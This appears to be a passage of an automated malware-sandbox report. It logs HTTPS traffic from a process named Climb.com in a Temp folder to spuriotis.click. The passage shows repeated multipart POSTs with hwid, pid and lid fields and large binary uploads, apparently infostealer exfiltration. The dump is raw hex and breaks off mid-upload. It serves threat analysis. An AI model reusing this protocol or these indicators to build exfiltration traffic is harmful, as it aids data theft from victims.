2024-12-27 13:51:34 UTC	12833	OUT	Data Raw: 2d 2d 4c 54 4b 44 30 4d 42 55 4a 42 33 41 56 4f 55 33 32 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 35 45 32 43 31 43 32 35 33 37 37 31 31 30 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 4c 54 4b 44 30 4d 42 55 4a 42 33 41 56 4f 55 33 32 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 54 4b 44 30 4d 42 55 4a 42 33 41 56 4f 55 33 32 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a Data Ascii: --LTKD0MBUJB3AVOU32NContent-Disposition: form-data; name="hwid"E05E2C1C25377110D9AC212D15D33917--LTKD0MBUJB3AVOU32NContent-Disposition: form-data; name="pid"2--LTKD0MBUJB3AVOU32NContent-Disposition: form-data; name="lid"5FwhVM--lll
2024-12-27 13:51:36 UTC	1132	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:51:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=60oqhq55jcg1kh0bob9bnjv0nr; expires=Tue, 22 Apr 2025 07:38:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z8o7jbgw8exi3uLsXPiAG7Vw3IgOx%2BFA157wD4lf%2F3L008DQztSxtHJHmRs4yGfjXHkARlJb3rv9%2F5uiVdWUMGGrCcIKRPtRG0M4p2aVq%2F9QEBbXHo%2BucNIWf2i2VaiUMbk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89c9446b9e0c76-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1644&rtt_var=619&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2833&recv_bytes=13772&delivery_rate=1765417&cwnd=151&unsent_bytes=0&cid=8bac62b1cc2ac519&ts=1325&x=0"
2024-12-27 13:51:36 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 13:51:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49747	104.21.2.51	443	6172	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:51:37 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Y25C5G3CDRZKUFF8AIE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15081 Host: spuriotis.click
2024-12-27 13:51:37 UTC	15081	OUT	Data Raw: 2d 2d 59 32 35 43 35 47 33 43 44 52 5a 4b 55 46 46 38 41 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 35 45 32 43 31 43 32 35 33 37 37 31 31 30 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 59 32 35 43 35 47 33 43 44 52 5a 4b 55 46 46 38 41 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 32 35 43 35 47 33 43 44 52 5a 4b 55 46 46 38 41 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c Data Ascii: --Y25C5G3CDRZKUFF8AIEContent-Disposition: form-data; name="hwid"E05E2C1C25377110D9AC212D15D33917--Y25C5G3CDRZKUFF8AIEContent-Disposition: form-data; name="pid"2--Y25C5G3CDRZKUFF8AIEContent-Disposition: form-data; name="lid"5FwhVM--ll
2024-12-27 13:51:38 UTC	1131	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:51:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3frej3ssdi2tke50kvbcc9402j; expires=Tue, 22 Apr 2025 07:38:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tjudrxE06GLxyzr1W%2BExnXcIa0kLDiF5V9DB%2BKPm8vEUGvDeMQRflZtuKS%2BN7YMETykh0KmN7CI0a4sYU6SvnuIB3efsP3Bc2MHn7KkS%2FVVL0X8QsYCWa%2FoO0pMGG4nD32Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89c956bedbc33c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1553&rtt_var=601&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2833&recv_bytes=16021&delivery_rate=1794714&cwnd=148&unsent_bytes=0&cid=285f295ded11cfa9&ts=843&x=0"
2024-12-27 13:51:38 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 13:51:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49753	104.21.2.51	443	6172	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:51:40 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=RWNFFP6SKM37MQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20541 Host: spuriotis.click
2024-12-27 13:51:40 UTC	15331	OUT	Data Raw: 2d 2d 52 57 4e 46 46 50 36 53 4b 4d 33 37 4d 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 35 45 32 43 31 43 32 35 33 37 37 31 31 30 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 52 57 4e 46 46 50 36 53 4b 4d 33 37 4d 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 52 57 4e 46 46 50 36 53 4b 4d 33 37 4d 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 52 57 4e 46 46 50 36 53 4b 4d Data Ascii: --RWNFFP6SKM37MQContent-Disposition: form-data; name="hwid"E05E2C1C25377110D9AC212D15D33917--RWNFFP6SKM37MQContent-Disposition: form-data; name="pid"3--RWNFFP6SKM37MQContent-Disposition: form-data; name="lid"5FwhVM--lll--RWNFFP6SKM
2024-12-27 13:51:40 UTC	5210	OUT	Data Raw: 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 3Wun 4F([:7s~X`nO`i
2024-12-27 13:51:41 UTC	1126	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:51:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bab6gib430olota3dpdfg0eght; expires=Tue, 22 Apr 2025 07:38:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Amv48Tg8YouTTlSXSMNV2Es316v%2F565QfJbe1dOm5bgUyOMBpMEaN2eGzLgtfGoqIyCvNk4hGJHLp16x0tW%2FQQitYQoKouMJLCwCh5jvVBLfeJlvwfAnCQpI0PPG2kpnUG8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89c9659b8417a9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1533&min_rtt=1519&rtt_var=597&sent=15&recv=25&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21498&delivery_rate=1790312&cwnd=238&unsent_bytes=0&cid=d108ac4f18d963a9&ts=1021&x=0"
2024-12-27 13:51:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 13:51:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49760	104.21.2.51	443	6172	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:51:43 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SCDHFNJO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1170 Host: spuriotis.click
2024-12-27 13:51:43 UTC	1170	OUT	Data Raw: 2d 2d 53 43 44 48 46 4e 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 35 45 32 43 31 43 32 35 33 37 37 31 31 30 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 53 43 44 48 46 4e 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 43 44 48 46 4e 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 53 43 44 48 46 4e 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f Data Ascii: --SCDHFNJOContent-Disposition: form-data; name="hwid"E05E2C1C25377110D9AC212D15D33917--SCDHFNJOContent-Disposition: form-data; name="pid"1--SCDHFNJOContent-Disposition: form-data; name="lid"5FwhVM--lll--SCDHFNJOContent-Dispositio
2024-12-27 13:51:44 UTC	1124	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:51:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8jtmgclsepv2vv8j006b6vj7n6; expires=Tue, 22 Apr 2025 07:38:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7eGlRpFNUijbyDBR1MHaCHrUOcfsx0fq9Zcx2%2FD54H7lNtgE4ClzuvWc80%2BqIXnVhM4bS7e1lqrOmvOl5acKf1boC9Zg1Iw5CpYo1vmNA0Ay7z7d9cGrAGklxVxml%2Fi7FHI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89c9779f907cf6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2006&min_rtt=2005&rtt_var=755&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2076&delivery_rate=1446977&cwnd=193&unsent_bytes=0&cid=c376606097379e45&ts=993&x=0"
2024-12-27 13:51:44 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 13:51:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49767	104.21.2.51	443	6172	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:51:45 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=GSHDE4Q0M0OLFUCDD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 551337 Host: spuriotis.click
2024-12-27 13:51:45 UTC	15331	OUT	Data Raw: 2d 2d 47 53 48 44 45 34 51 30 4d 30 4f 4c 46 55 43 44 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 35 45 32 43 31 43 32 35 33 37 37 31 31 30 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 47 53 48 44 45 34 51 30 4d 30 4f 4c 46 55 43 44 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 53 48 44 45 34 51 30 4d 30 4f 4c 46 55 43 44 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 47 Data Ascii: --GSHDE4Q0M0OLFUCDDContent-Disposition: form-data; name="hwid"E05E2C1C25377110D9AC212D15D33917--GSHDE4Q0M0OLFUCDDContent-Disposition: form-data; name="pid"1--GSHDE4Q0M0OLFUCDDContent-Disposition: form-data; name="lid"5FwhVM--lll--G
2024-12-27 13:51:45 UTC	15331	OUT	Data Raw: e1 ee 1c 48 43 51 ca df 64 11 17 86 2f 47 97 d6 e4 07 4a cd 05 b0 5f 68 af 88 83 77 ca 2d d5 46 4d 4b d1 df 71 e7 fc cc 9e 28 c6 cb 6e fd 92 25 a7 78 cb de d8 f1 34 7f 4b ab c7 e3 be af c0 a2 8e 64 42 f7 0f 61 94 81 d9 68 15 ff 42 91 d4 b8 ac 44 61 9a a5 0b 74 29 55 32 6e 2d 93 45 19 12 bd 54 91 38 9e 11 41 b2 36 6d f7 95 ad 78 54 0b 4b 48 4a 6e 67 28 47 c2 42 89 de ac d9 e9 dd 82 60 59 88 91 4c 2d 3a 8d 0b b4 47 53 4b b6 3a 1d 9f 26 57 7a 3c c7 c3 5e 50 85 88 54 da 27 88 1e 23 cd 4a 8f 82 52 27 9c 19 ba 78 96 48 f3 e5 83 4c 07 d8 91 bb c8 ae 53 40 ad f2 03 fa 92 c8 d6 4e 34 3c a7 dd 0a 98 45 21 95 7c 28 50 5f 7a ac c8 0a b6 de 32 72 15 b2 5b bb 27 d5 f4 9c 69 7f f9 bd 2b 58 2b 3f 62 f3 4e 6b 73 a5 62 df fa 9c ab fd db c1 17 b8 fe 52 67 d7 02 01 07 b7 b7 Data Ascii: HCQd/GJ_hw-FMKq(n%x4KdBahBDat)U2n-ET8A6mxTKHJng(GB`YL-:GSK:&Wz<^PT'#JR'xHLS@N4<E!\|(P_z2r['i+X+?bNksbRg
2024-12-27 13:51:45 UTC	15331	OUT	Data Raw: 88 6f 5e 7a fe ca 8c d5 40 28 3f 31 28 d0 8a e6 90 ad da ad c5 e7 29 49 1e fa 95 da 0c c9 33 e4 ff 3c 22 8e aa 56 68 48 3c 30 10 a8 8b 57 97 94 bb 60 9d 29 54 1d 1e 7e 70 9c d6 b8 6e 9a 90 39 df c5 66 1a 56 a8 7d 33 b4 9e 79 91 26 32 2e cb 7d bd 8d 78 cb 48 17 77 d0 36 a1 f5 d2 83 d7 ca 5e a4 5e c2 a1 91 7a eb 9a 93 d5 a7 11 d9 bf 61 d1 55 f1 57 53 d9 2d ff 8d 01 57 7a 8a 43 c0 6c c1 a4 66 97 dd 23 de b7 4a 8e eb 5d b6 81 27 4a f0 1c f0 1b f8 be f5 17 ef e7 bf 59 6d f3 5c 66 f5 b2 ed d0 c6 85 bb 9d 17 5d 5e 3b f2 9a 44 7e b8 05 bb 07 6c 54 da af 5f d2 75 e7 ce 07 2d a9 b7 ff fc 53 05 4d 57 05 69 a1 8c 42 e1 0a 43 88 3a f1 e8 b3 fe 73 43 ee da 4e 19 ce 12 60 a1 f0 73 83 6e 10 18 9a 45 30 97 cb 0f c0 88 bf 9a 6a 70 0b b0 d2 bf a9 5d d7 06 bf 4a 11 15 e0 05 Data Ascii: o^z@(?1()I3<"VhH<0W`)T~pn9fV}3y&2.}xHw6^^zaUWS-WzClf#J]'JYm\f]^;D~lT_u-SMWiBC:sCN`snE0jp]J
2024-12-27 13:51:45 UTC	15331	OUT	Data Raw: 8b e1 4a 01 a6 ff 4c 65 45 0a fb ad 10 0a c5 2d f1 ca f6 ef 24 3a c0 e1 81 7e 2a 9f f7 0a a4 be a6 10 ba 17 8d e4 ec d4 8a c3 6e 10 a3 ce 9c 17 1d a1 bd fb d7 c4 ec bd 5b 5f 3d 8a 00 c8 8a 5e 5d 32 69 ca 11 93 4a dd 68 46 f7 a5 59 a4 3a 11 47 91 05 ff a7 47 c8 7f bb fb 53 ff 5e d9 a5 ff 0b 42 c0 d1 34 48 6b 22 c4 bc 96 00 b2 3d 3d 39 9e 7e a0 de 75 c7 c1 57 21 81 cd 7e 68 f2 03 d8 55 2c 5a 1a de ec 14 58 bc 0b c8 9e 56 60 74 fe b3 5f 7f 64 2b 66 3d 0c ac 49 72 85 95 16 ed 00 fc 65 f0 dd 70 a5 f7 fa c3 aa ca df 73 97 f3 f4 bc db d1 e7 05 b0 25 56 6a 8c 64 43 a0 40 a0 79 9c 14 d4 ce d1 98 ca e8 89 cf 61 bc ea 70 d2 45 d3 d2 2c 90 54 f3 62 cb a6 70 7a b0 06 2e a8 26 7f 86 f5 f4 c6 58 77 e4 e4 2c b3 2e 86 5c 6d 6c 4e 72 90 58 1b d4 5f 4e 28 c4 32 eb 4d 1e 54 Data Ascii: JLeE-$:~*n[_=^]2iJhFY:GGS^B4Hk"==9~uW!~hU,ZXV`t_d+f=Ireps%VjdC@yapE,Tbpz.&Xw,.\mlNrX_N(2MT
2024-12-27 13:51:45 UTC	15331	OUT	Data Raw: c6 04 f6 9f 98 b3 2a a6 8e 62 ce e5 45 ed 4a 0a a1 e1 cf 51 5c 05 2d 7b 85 aa bc af a5 4a c3 da dd 6f 9b 48 0a 9c 2d bd f9 71 a4 1c 89 f5 f1 f3 db 0f 09 35 74 1a 73 af e1 20 68 63 2b a9 b8 c9 11 42 43 58 68 05 bf 0a d6 89 d9 7b 49 b4 c7 f6 db d8 c3 29 a8 4a fe 61 c2 8b fc e6 77 f5 73 d7 17 c2 63 af f5 1d 08 6a c3 e7 45 85 ef 00 ea a1 f4 24 61 57 e7 54 1f a1 73 00 79 e4 55 ca 83 c9 28 72 b4 17 f4 4e 21 01 10 06 20 bf fd bd 7f 1b 0f 44 ad 1e c5 49 0b 37 64 ec 6a ae 0b e3 e7 97 62 ff 12 17 53 c0 8a 1c a0 2f 07 b6 0a 55 6d c2 a5 9e 1f 5f 1b 96 33 e2 58 8f 6e 44 54 b8 28 84 f2 83 9f 1e 32 37 5a 4e 63 61 ef 3f 9e 47 ab 9c 52 14 5a ea 22 f9 81 c5 22 f0 cf 4d 6b b6 bc 6b f1 c3 2f b7 8e 3e 3e c2 29 67 bd 5b d6 24 cb 8c 1f 15 34 dd 33 f1 76 86 a1 09 64 51 b4 92 38 Data Ascii: *bEJQ\-{JoH-q5ts hc+BCXh{I)JawscjE$aWTsyU(rN! DI7djbS/Um_3XnDT(27ZNca?GRZ""Mkk/>>)g[$43vdQ8
2024-12-27 13:51:45 UTC	15331	OUT	Data Raw: fa 97 c6 38 92 16 74 19 a0 af f5 67 df 31 c3 66 19 6d 5e c3 d2 0f 0c f8 b4 c1 fc f9 c6 75 61 c3 9f 2a f9 21 82 57 74 0a 9b d5 04 3b 4b e7 fb 23 63 0c cf 23 fb 79 5d d2 1b 0a 7c 3e 67 e5 b8 4b 87 a1 da fa 4d 13 54 a2 c0 fc fc 2d e1 e9 af 80 1e ff 69 be f4 06 3b 1d 50 4a 21 38 d3 fb 08 72 f3 08 af 30 87 6f 03 bd fa b9 16 0b c7 fa 6d 39 f1 da e7 4a ff 64 a3 03 45 60 b4 1a 29 54 c0 48 2b ae 3a e3 db bc 05 0b ae 6c f8 9f 96 86 94 24 10 22 93 f8 ed 9b 0b 08 3e f1 d3 22 df 89 e3 3b 29 d5 80 a0 78 75 e3 f9 80 2c fc 0b 0d ec a1 41 2c 20 cb 4a 7c 23 d1 c5 20 ba c5 39 81 34 1c d8 83 52 f8 7d 88 ee 45 20 ec f7 04 65 37 90 7c d1 a9 81 80 8f ff 81 77 ed bd f2 e5 bc 13 d6 15 c5 c7 cc 4b fc e2 88 7d eb 2b b1 aa 22 f2 cd 8e e2 77 b8 b0 76 72 71 ea 09 ba 8b 2f 42 7d d9 7c Data Ascii: 8tg1fm^ua*!Wt;K#c#y]\|>gKMT-i;PJ!8r0om9JdE`)TH+:l$">";)xu,A, J\|# 94R}E e7\|wK}+"wvrq/B}\|
2024-12-27 13:51:45 UTC	15331	OUT	Data Raw: cb 00 d4 6e ac fe 51 04 51 2b a9 8a 3f 78 21 4d 2b cf 4a 42 d6 d7 02 ff 64 53 68 21 63 2d 7e 3c ee c6 8f 56 ea 6a f9 79 34 75 80 e7 cb b3 5d ae 08 cf 56 d2 23 d6 ec b9 10 b3 96 79 64 e9 df c3 47 96 d6 59 54 c3 57 bd fd 21 1f c3 db 81 53 2b b7 c6 9b a3 7f 75 f4 bf a9 ad ac 31 c0 b8 7b 24 64 a5 5f 0e 88 03 2f cf ff 5b 11 aa 6d c8 e7 75 5b d4 ff ec 49 59 8b b3 5f dd de f9 24 72 ab a6 3d 50 21 29 c3 ca 74 ef 92 13 d3 e1 4b 48 1d 13 7c 6a 83 12 ea 68 32 d6 59 40 e0 72 6f 54 e9 2e 52 cb 37 f4 cb ff 7f ad 60 70 f0 e6 aa d1 2b a0 2d 9e 2e 0e b2 a4 d1 4a fa e0 18 b6 b8 ad 54 43 e4 db 7d 38 e2 e8 bc 41 04 77 ab 03 0e 92 5c 3f 69 a4 2d 03 e0 c9 f5 5f ea f5 de 42 14 ad e8 d2 6f 33 99 2e eb 05 24 a7 d6 f1 c8 12 ec f6 54 9e db 6b b4 eb 4d d3 b7 a8 8f b6 61 91 c9 c0 1d Data Ascii: nQQ+?x!M+JBdSh!c-~<Vjy4u]V#ydGYTW!S+u1{$d_/[mu[IY_$r=P!)tKH\|jh2Y@roT.R7`p+-.JTC}8Aw\?i-_Bo3.$TkMa
2024-12-27 13:51:45 UTC	15331	OUT	Data Raw: 6a 4d 56 7e d7 9e 94 70 0e 82 8e 91 3e ec ee aa fb 91 d8 85 55 62 d2 9e 2c 2a 36 3b c8 37 fe f1 3f d9 28 f0 9a d5 b5 b7 d8 39 93 e3 e3 7f 96 a6 de 79 54 9a 38 a6 fe b4 6a 8c bc 56 b5 25 be 20 36 e6 55 01 03 16 a5 f1 6c bb 78 c5 74 52 5f 7a bf f9 93 0f 0a 63 fe 79 1a e2 16 ef 7e b5 4e 8e 87 53 e3 07 29 df 2d cf 3d 29 0f 92 15 3f 56 97 11 44 38 e5 e0 55 f5 8b e4 a1 b1 33 b3 10 1b 10 ff fe 27 e4 f3 24 cc 41 dc 1c 8c 02 9e d2 f4 ba 06 27 e7 8c 6a 4b 71 30 bd 8d d7 b2 27 3e 4c b0 3f 36 98 b8 28 f7 1b 9a 3b 1a 52 9e 07 04 23 0a 6b 39 f6 df 08 a7 55 8d b0 72 6f 6e b9 14 d4 06 21 89 26 36 7a ac bf 50 7f 65 a2 cb 22 68 0a f1 cb d3 76 c7 07 09 53 bf e0 23 a5 7b da 47 9f be 2f 61 bc 6f 7a 2d bd f5 f7 a7 c1 2c 32 99 73 2b 29 71 9d 66 4c e0 53 f5 e3 fd c4 b6 ba b6 02 Data Ascii: jMV~p>Ub,*6;7?(9yT8jV% 6UlxtR_zcy~NS)-=)?VD8U3'$A'jKq0'>L?6(;R#k9Uron!&6zPe"hvS#{G/aoz-,2s+)qfLS
2024-12-27 13:51:45 UTC	15331	OUT	Data Raw: 3b cf d1 9a d3 4b 3c 68 69 22 ee 38 4c 18 3b f9 98 bc 36 64 59 7a 64 d3 1f c4 43 9a 74 3b bf 36 a5 89 28 bd 78 a0 da cc 7d 75 db 32 79 12 9a 07 33 04 21 a5 4b 96 ef 4f 42 f1 6b d6 b0 29 cf df 78 ba c9 55 b7 33 c7 54 df 25 21 35 e5 69 75 82 fc 4f cb fa 53 d2 17 49 d7 aa 3f 54 a9 ce b8 8e d8 2a 11 f8 75 fd a4 34 28 3b 8f 8a b2 88 b2 34 b3 76 d6 f4 54 b3 cc d0 c1 1d 1a dd 6f 19 cb d8 04 b2 03 b0 f2 4a b5 01 bb 5b 9e 5e 0b 16 05 c9 71 d2 51 16 b1 31 e1 b5 bb 23 5a d3 7b 23 a1 cc 95 e0 ff 79 3d 44 f6 bf 5f 2f 99 de ee 7f 20 0e b2 70 98 ff cf 01 9a 22 d3 6d b1 f0 bd d8 7c 85 d3 9d d7 ac 3f c7 6f 92 a9 9a a0 56 53 4b d0 b6 c7 76 